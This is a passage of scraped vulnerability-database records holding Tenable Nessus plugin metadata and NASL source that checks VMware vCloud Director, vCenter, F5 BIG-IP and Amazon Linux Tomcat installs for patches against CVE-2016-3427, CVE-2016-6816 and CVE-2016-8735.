"2023-05-14T00:00:00", "cpe": ["cpe:/a:vmware:vcloud_director"], "id": "VMWARE_VCLOUD_DIRECTOR_VMSA-2016-0005.NASL", "href": "https://www.tenable.com/plugins/nessus/91828", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91828);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-3427\");\n script_xref(name:\"VMSA\", value:\"2016-0005\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"VMware vCloud Director 5.5.x < 5.5.6.1 / 5.6.x < 5.6.5.1 / 8.0.x < 8.0.1.1 JMX Deserialization RCE (VMSA-2016-0005)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization appliance installed on the remote host is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCloud Director installed on the remote host is\n5.5.x prior to 5.5.6.1, 5.6.x prior to 5.6.5.1, or 8.0.x prior to\n8.0.1.1. It is, therefore, affected by a flaw in the bundled Oracle\nJRE JMX subcomponent due to deserializing any class when deserializing\nauthentication credentials. An unauthenticated, remote attacker can\nexploit this to execute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2016-0005.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCloud Director version 5.5.6.1 / 5.6.5.1 / 8.0.1.1\nor later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3427\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcloud_director\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcloud_director_installed.nbin\");\n script_require_keys(\"Host/VMware vCloud Director/Version\", \"Host/VMware vCloud Director/Build\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/VMware vCloud Director/Version\");\nbuild = get_kb_item_or_exit(\"Host/VMware vCloud Director/Build\");\n\nfixed_ver = '';\nfixed_build = '';\n\nif (version =~ \"^5\\.5\\.\")\n{\n fixed_ver = '5.5.6.1';\n fixed_build = '3814538';\n}\nelse if (version =~ \"^5\\.6\\.\")\n{\n fixed_ver = '5.6.5.1';\n fixed_build = '3814650';\n}\nelse if (version =~ \"^8\\.0\\.\")\n{\n fixed_ver = '8.0.1.1';\n fixed_build = '3864078';\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'VMware vCloud Director', version + ' Build ' + build);\n\nif (\n (ver_compare(ver:version, fix:fixed_ver, strict:FALSE) < 0) &&\n (build < fixed_build)\n)\n{\n report = '\\n Installed version : ' + version + ' Build ' + build +\n '\\n Fixed version : ' + fixed_ver + ' Build ' + fixed_build +\n '\\n';\n security_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'VMware vCloud Director', version + ' Build ' + build);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:29:42", "description": "The version of VMware vCenter Server installed on the remote host is 5.0.x prior to 5.0u3e, 5.1.x prior to 5.1u3b, 5.5.x prior to 5.5u3 (Linux), 5.5.x prior to 5.5u3b (Windows), or 6.0.x prior to 6.0.0b.\nIt is, therefore, affected by a flaw in Oracle JMX when deserializing authentication credentials. An unauthenticated, remote attacker can exploit this to execute arbitrary code.", "cvss3": {}, "published": "2016-05-25T00:00:00", "type": "nessus", "title": "VMware vCenter Server 5.0.x < 5.0u3e / 5.1.x < 5.1u3b / 5.5.x < 5.5u3 (Linux) / 5.5.x < 5.5u3b (Windows) / 6.0.x < 6.0.0b JMX Deserialization RCE (VMSA-2016-0005)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3427"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_VMSA-2016-0005.NASL", "href": "https://www.tenable.com/plugins/nessus/91322", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91322);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-3427\");\n script_xref(name:\"VMSA\", value:\"2016-0005\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"VMware vCenter Server 5.0.x < 5.0u3e / 5.1.x < 5.1u3b / 5.5.x < 5.5u3 (Linux) / 5.5.x < 5.5u3b (Windows) / 6.0.x < 6.0.0b JMX Deserialization RCE (VMSA-2016-0005)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization management application installed on the remote host\nis affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is\n5.0.x prior to 5.0u3e, 5.1.x prior to 5.1u3b, 5.5.x prior to 5.5u3\n(Linux), 5.5.x prior to 5.5u3b (Windows), or 6.0.x prior to 6.0.0b.\nIt is, therefore, affected by a flaw in Oracle JMX when deserializing\nauthentication credentials. An unauthenticated, remote attacker can\nexploit this to execute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2016-0005.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server version 5.0u3e (5.0.0 build-3073236)\n/ 5.1u3b on Linux or Windows (5.1.0 build-3070521) / 5.1u3d on Windows\n(5.1.0 build-3814779) / 5.5u3 on Linux (5.5.0 build-3000241) / 5.5u3b\non Windows (5.5.0 build-3252642) / 5.5u3d on Windows (5.5.0\nbuild-3721164) / 6.0.0b (6.0.0 build-2776510) or later.\n\nNote that vCenter Server Windows releases 5.0 u3e, 5.1 u3b, and 5.5\nu3b additionally require KB 2144428 to be applied. See VMSA-2015-0007\nfor details. Alternatively, versions 5.1 and 5.5 on Windows may be\nfixed with their respective u3d builds.\n\nFurthermore, remote and local exploitation of this vulnerability is\nfeasible on vCenter Server 6.0 and 6.0.0a for Windows. Remote\nexploitation is not feasible on vCenter Server 6.0.0b (and above) for\nWindows but local exploitation is. The local exploitation\nvulnerability can be resolved by applying the steps of KB 2145343 to\nvCenter Server version 6.0.0b (and above) for Windows.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3427\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service.nasl\", \"os_fingerprint.nasl\", \"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_kb_item_or_exit(\"Host/VMware/vCenter\");\nversion = get_kb_item_or_exit(\"Host/VMware/version\");\nrelease = get_kb_item_or_exit(\"Host/VMware/release\");\n\n# Extract and verify the build number\nbuild = ereg_replace(pattern:'^VMware vCenter Server [0-9\\\\.]+ build-([0-9]+)$', string:release, replace:\"\\1\");\nif (empty_or_null(build) || build !~ '^[0-9]+$') audit(AUDIT_UNKNOWN_BUILD, \"VMware vCenter Server\");\n\nbuild = int(build);\nrelease = release - 'VMware vCenter Server ';\nfixversion = NULL;\nos = get_kb_item(\"Host/OS\");\n\n# Check version and build numbers\nif (version =~ '^VMware vCenter 5\\\\.0$')\n{\n # 5.0 U3e\n # Windows and Linux\n # Note that Windows requires KB 2144428\n fixbuild = 3073236;\n if (build < fixbuild)\n {\n fixversion = '5.0.0 build-'+fixbuild;\n if (\"Windows\" >< os) fixversion += \" + KB 2144428\";\n }\n}\nelse if (version =~ '^VMware vCenter 5\\\\.1$')\n{\n # Possible Windows fixes include:\n # 5.1 U3b with KB 2144428\n # 5.1 U3d\n\n fixbuild = 3070521; # 5.1 U3b for Windows and Linux\n if (build < fixbuild)\n {\n fixversion = '5.1.0 build-'+fixbuild;\n if (\"Windows\" >< os)\n {\n # 5.1 U3d = build 3814779\n fixversion += ' + KB 2144428 or 5.1.0 build-3814779';\n }\n }\n}\nelse if (version =~ '^VMware vCenter 5\\\\.5$')\n{\n # If not paranoid, let's check to see if OS is populated\n if (report_paranoia < 2 && empty_or_null(os))\n exit(0, \"Can not determine version 5.5 fix build because Host/OS KB item is not set.\");\n\n if (\"Windows\" >< os)\n {\n # Possible Windows fixes include:\n # 5.5 U3b with KB 2144428\n # 5.5 U3d\n fixbuild = 3252642; # 5.5 U3b\n if (build < fixbuild)\n {\n # 5.5 U3d = build 3721164\n fixversion = '5.5.0 build-'+fixbuild+' + KB 2144428 or 5.5.0 build-3721164';\n }\n }\n else\n {\n # 5.5 U3\n fixbuild = 3000241;\n if (build < fixbuild) fixversion = '5.5.0 build-'+fixbuild;\n }\n}\nelse if (version =~ '^VMware vCenter 6\\\\.0$')\n{\n # 6.0.0b\n # Windows and Linux\n # Note that Windows requires KB 2145343\n fixbuild = 2776510;\n if (build < fixbuild)\n {\n fixversion = '6.0.0 build-'+fixbuild;\n if (\"Windows\" >< os) fixversion += \" + KB 2145343\";\n }\n}\n\nif (isnull(fixversion))\n audit(AUDIT_LISTEN_NOT_VULN, 'VMware vCenter', port, release);\n\nreport = report_items_str(\n report_items:make_array(\n \"Installed version\", release,\n \"Fixed version\", fixversion\n ),\n ordered_fields:make_list(\"Installed version\", \"Fixed version\")\n);\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:43:43", "description": "Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77;\nJava SE Embedded 8u77; and JRockit R28.3.9 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JMX. (CVE-2016-3427)", "cvss3": {}, "published": "2016-12-21T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Oracle Java SE vulnerability (K73112451)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3427"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL73112451.NASL", "href": "https://www.tenable.com/plugins/nessus/95969", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K73112451.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95969);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-3427\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"F5 Networks BIG-IP : Oracle Java SE vulnerability (K73112451)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77;\nJava SE Embedded 8u77; and JRockit R28.3.9 allows remote attackers to\naffect confidentiality, integrity, and availability via vectors\nrelated to JMX. (CVE-2016-3427)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K73112451\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K73112451.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/21\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K73112451\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"12.0.0-12.1.1\",\"11.4.0-11.6.1\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.1.2\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"12.0.0-12.1.1\",\"11.4.0-11.6.1\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.1.2\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"12.0.0-12.1.1\",\"11.4.0-11.6.1\",\"11.2.1\",\"10.2.1-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.1.2\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"12.0.0-12.1.1\",\"11.4.0-11.6.1\",\"11.2.1\",\"10.2.1-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.1.2\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"12.0.0-12.1.1\",\"11.4.0-11.6.1\",\"11.2.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.1.2\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"12.0.0-12.1.1\",\"11.4.0-11.6.1\",\"11.2.1\",\"10.2.1-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.1.2\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"12.0.0-12.1.1\",\"11.4.0-11.6.1\",\"11.2.1\",\"10.2.1-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.1.2\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"12.0.0-12.1.1\",\"11.4.0-11.6.1\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.1.2\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:15:37", "description": "According to its self-reported version number, the Apache Tomcat service running on the remote host is 6.0.x prior to 6.0.48, 7.0.x prior to 7.0.73, 8.0.x prior to 8.0.39. It is, therefore, affected by multiple vulnerabilities:\n\n - A flaw exists that is triggered when handling request lines containing certain invalid characters. An unauthenticated, remote attacker can exploit this, by injecting additional headers into responses, to conduct HTTP response splitting attacks. (CVE-2016-6816)\n\n - A remote code execution vulnerability exists in the JMX listener in JmxRemoteLifecycleListener.java due to improper deserialization of Java objects. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2016-8735)\n\nNote that Nessus Network Monitor has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2019-05-10T00:00:00", "type": "nessus", "title": "Apache Tomcat 6.0.x < 6.0.48 / 7.0.x < 7.0.73 / 8.0.x < 8.0.39 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2019-05-10T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "700668.PASL", "href": "https://www.tenable.com/plugins/nnm/700668", "sourceData": "Binary data 700668.pasl", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:42:46", "description": "CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to permitting invalid character in HTTP requests\n\nCVE-2016-8735 tomcat: Remote code execution vulnerability in JmxRemoteLifecycleListener", "cvss3": {}, "published": "2016-12-16T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : tomcat7 (ALAS-2016-777)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat7", "p-cpe:/a:amazon:linux:tomcat7-admin-webapps", "p-cpe:/a:amazon:linux:tomcat7-docs-webapp", "p-cpe:/a:amazon:linux:tomcat7-el-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-javadoc", "p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api", "p-cpe:/a:amazon:linux:tomcat7-lib", "p-cpe:/a:amazon:linux:tomcat7-log4j", "p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api", "p-cpe:/a:amazon:linux:tomcat7-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-777.NASL", "href": "https://www.tenable.com/plugins/nessus/95897", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-777.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95897);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-8735\");\n script_xref(name:\"ALAS\", value:\"2016-777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Amazon Linux AMI : tomcat7 (ALAS-2016-777)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to\npermitting invalid character in HTTP requests\n\nCVE-2016-8735 tomcat: Remote code execution vulnerability in\nJmxRemoteLifecycleListener\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2016-777.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update tomcat7' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-admin-webapps-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-docs-webapp-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-el-2.2-api-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-javadoc-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-jsp-2.2-api-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-lib-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-log4j-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-servlet-3.0-api-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-webapps-7.0.73-1.23.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat7 / tomcat7-admin-webapps / tomcat7-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:43:42", "description": "CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to permitting invalid character in HTTP requests\n\nCVE-2016-8735 tomcat: Remote code execution vulnerability in JmxRemoteLifecycleListener", "cvss3": {}, "published": "2016-12-16T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : tomcat6 (ALAS-2016-776)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat6", "p-cpe:/a:amazon:linux:tomcat6-admin-webapps", "p-cpe:/a:amazon:linux:tomcat6-el-2.1-api", "p-cpe:/a:amazon:linux:tomcat6-docs-webapp", "p-cpe:/a:amazon:linux:tomcat6-javadoc", "p-cpe:/a:amazon:linux:tomcat6-jsp-2.1-api", 